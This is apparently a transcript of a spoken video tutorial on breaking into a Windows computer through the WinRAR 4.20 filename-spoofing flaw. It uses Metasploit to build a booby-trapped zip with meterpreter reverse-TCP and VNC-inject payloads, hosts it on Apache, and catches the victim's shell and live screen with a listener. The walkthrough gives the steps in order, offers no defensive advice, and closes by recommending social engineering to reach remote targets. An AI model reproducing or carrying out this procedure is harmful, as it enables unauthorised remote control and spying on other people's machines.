Hello everyone, in this tutorial we are going to learn how to hack into a Windows machine using WinRAR. Now there is a particular version of WinRAR which is vulnerable and the version is 4.20. So using that vulnerability we can get access to any Windows machine remotely using Metasploit console. So let's first check whether the victim machine is having the WinRAR 4.20 or not. So I'm using VMware here to create a local connection, local network. So we check the WinRAR version. We go to the WinRAR and see the version here is 4.20. So this exploit will only work on the version 4.20. Let's fire up our Kali. Now we have to open MSF console. So go to the terminal, type MSF console, and we have to wait a bit for Metasploit to get loaded. Here it comes. Metasploit is huge, so it takes a lot of time. Here it comes. So let's first search for the particular vulnerability using WinRAR. So we are going to type search WinRAR. It's going to return the list of all the vulnerabilities that are present in WinRAR and all the exploits available here. So basically it's going to return with a list of exploits which we can use. Here it comes. We have this exploit with the name exploit Windows file format WinRAR name spoofing. So basically what this exploit does is uses name spoofing to get access, and as we can see the rank is excellent, and this exploit was disclosed in 2009 September 28th. So let's start. We have to use this, use exploit. Now we are in the exploit part. Now we can check the info if we need. Here we have the description of everything. You can check everything you want. Now we need to set the payload. We have to attach a payload. So basically what this exploit will do is it will create a zip file which will be attached with a malicious file, that is our payload, and this will be, when the user opens that file, it's going to return the access towards to us, to this machine. So let's first set the payload. So search all the available payloads. We have to show payloads. This will return all the payloads that we can use with this vulnerability, this exploit. So here is the list. In this tutorial I'm going to show you two of the payloads. One is the VNC inject one, and another one is the meterpreter one. So let's first go with the meterpreter one. Let's find the meterpreter one. Where is the meterpreter? And here is the meterpreter one. Windows meterpreter reverse TCP. So we are going to copy this simply, and then we are going to set payload. So just type set payload and then paste this payload. Now we set the payload. Now to use our exploit, we are going to check the options that are available. So we'll write show options. Here we have these three things required. Yes, yes, yes. Canceling this name, this exit function is required. Lhost is required, and lport is required. But we can see that lhost is not there, so we require to provide it with the lhost. Our lhost is our local machine which we are using to have. So we are going to set lhost, and we are going to find our IP address. Let's check our IP address. It's 192.168.1.2. Copy. So now we are ready to get our file. So we'll exploit. As you can see that it has created this msf.zip file. So we're now going to copy that particular file to our Apache folder so that we can send the link to the victim. Whenever he downloads and opens the file, we're going to get the access. So now let's copy the file to our Apache server. copy this to that www. Let's check it is copied or not. Where www.html. So we have a file. Okay, no issues. So now what we're going to do is we're going to get out of this exploit. We're going to set up a listener. See, whenever we throw a request to another computer to gain back the access, we need something to listen to the connection. So it's like throwing a ball up in the air and getting our hand ready to catch it in the right position. So we're going to activate a listener or a machine which will be listening whatever that particular exploit is sending to us. So let's use this particular listener. To use the listener, we're going to use use exploit multi handler. So here we are. We're going to follow the same steps. We have to set the payload first. Let's set the payload. Which payload we have to use the same payload which we used. So we used the meter one, right? So we are going to copy the same payload. We're going to paste it here. So here we have the same payload. Okay. Now we need to set the L host as previously. L host is 192.168.1.2. Oh, now we are ready. Now we are going to exploit it. So after exploiting, you can say that says that started reverse TCP handler on the particular machine. So we have started a particular listener on this machine, and we have also started the payload handler. So whenever the particular victim exploits, actually opens the malicious file which we are about to send to the user, which we have in our server, then we are going to get a meterpreter access here. So let's go to the victim machine for now and then open the particular malicious file. .192.168.1.2/msf.zip. So we have to save this file. Okay, now we open this file. So as soon as we open the file, we're going to get a readme.txt file. The user will open it. So I double click it to open it, and it has opened. Nothing happens in here. The user is able to see nothing. But if we go to our Kali, where the actual listener is activated, we get into a meterpreter shell. Now we have the access of the Windows machine. We can do anything on the Windows machine. So let's try to search in what particular directory we are now currently. So if we write here pwd, then I am in C users of the downloads. So I'm in the downloads currently. So let's check what the user has downloaded. So I'll type ls. Okay. The user has downloaded these all files are actually present in the user's download directory. So WinRAR 4.2.exe, rest of the IMSF wanted to MSF.zip, and all these things. So we can also get into the shell prompt, also that is the command prompt of the user. So here we are in the shell prompt. So now we can do anything. So please note that in Windows 7 we are not yet having any particular application open. So we're not having any notepad or say something like that open. So we're going to just type notepad. So basically what is happening here is I am using my meterpreter shell to execute a command prompt application on the Windows machine. So if I type notepad here, notepad will be opened on the remote machine. Here it is. The notepad is open. So voila, we have hacked into the victim's machine. Okay, this was one method. Okay, so now let's check another method. In this method, we are going to use a particular payload which is VNC inject. So let's try to do it. What we need to do is just repeat the steps but change the payload. So I'm going to clear it all and then okay, that's running. So let's exit this and okay, 7-minute process and exit the meterpreter and exit the go back to the home object. So let's use that particular exploit. We use only for WinRAR. So we are going to use okay. Here's the particular exploit. We're going to use the same exploit. Okay, let me clear everything first. Okay, so let's use this particular export. Now when we have to set payloads, we're going to search for the payloads, show payloads, and then whole new list is going to come up. Now we're going to use the one with the VNC inject. So let's use this VNC. Copy and then set payload VNC inject reverse TCP. Now we have to set the L host similarly. HST set L host is 192.168.1.2. This is yours. So let's first delete the previous payload that we created. Actually the msc.zip file, the malicious file. We go to var, we go to www, and we go to html, and delete this. Delete. So it's gone. So let's check the options. If anything is left, okay, everything is set up. LOS and port, everything is fine. So let's exploit it. So we have exploit. Similar is going to create one msc.zip again. We can also change the name of the file. If you want to change the name of the file, you can always use the variable file name. So you just have to type set file name, the new name you want. That's it. So let's use this name only for now. Similarly, I'm going to use Apache only. So I'm going to copy this to my Apache directory. With that www.html. Okay, let's check it's there or not. Okay, we have our msf file, the same file again but with different payload. We have to set up a listener again for the same. So let's set up another listener. So we're going to use exploit multi handler. Okay, now we have to set the payload. Set the same payload which was VCN index one. Here it is. Copy and paste. Set lhost. Set lhost 192.168.1.2. So here it is. Now let's check if everything is done. Okay, everything is good. We have the lhost as same. We have the lhost. Yeah. Right. So now it's exploit. Okay, so now whenever the user will open this thing, a new thing will happen. Let's find out what it is. So okay, the notepad is still running. So close the notepad, just refresh it, go to the browser. I haven't cleared the previous download, so I go to my directory, I go to download, and I delete. Okay, now go to 192. Okay, same is here. Insert it, save the file, and open it. As soon as we open it, let's see what we have. Okay, so we have a particular VNC viewer, but the session has gone in background. So let's check. Let's come up with a session. Okay, yeah. So here we have. So what we have here is the remote machine's access. It's not actually access, the view of whatever the particular machine is, whatever is happening on the particular machine. So if I minimize this, I'll actually get the whole screen access. So I have everything, whatever the user is. I can see, I can just sneak into whatever the user is doing. So that was all about VNC inject. Now if I go in a much detailed thing, so let's check. Let's find out what exactly is happening through the exploit. So if I open this, okay, let me first close this particular VNC so that it's going to do so. I close it. Okay, let's close it. Okay. Now go to my Windows machine. If I extract this particular file, say my desktop, you will see that it was no readme.txt file. So this is actually what is name splitting. So the user will think that's a simple readme.txt file, but in actual it is something vmmxsjet or exe file, which is actually doing its job of hacking the computer. So please note that I have used Kali for this demonstration. You can also use Windows. You can install Metasploit console in Windows. but that will require an additional installation of VNC viewer, without which you won't be able to use a particular VNC inject thing. So that's all. Voila, you have your screen. Enjoy. Also, one more thing, I used Apache to transfer the files since I'm on a LAN connection, so it's easy to transfer files through a Apache server. If the user is remote, you will use some additional steps to first get in the PC, and then you can send the file as an trusted file. It's totally up to your social engineering skills. So that's it.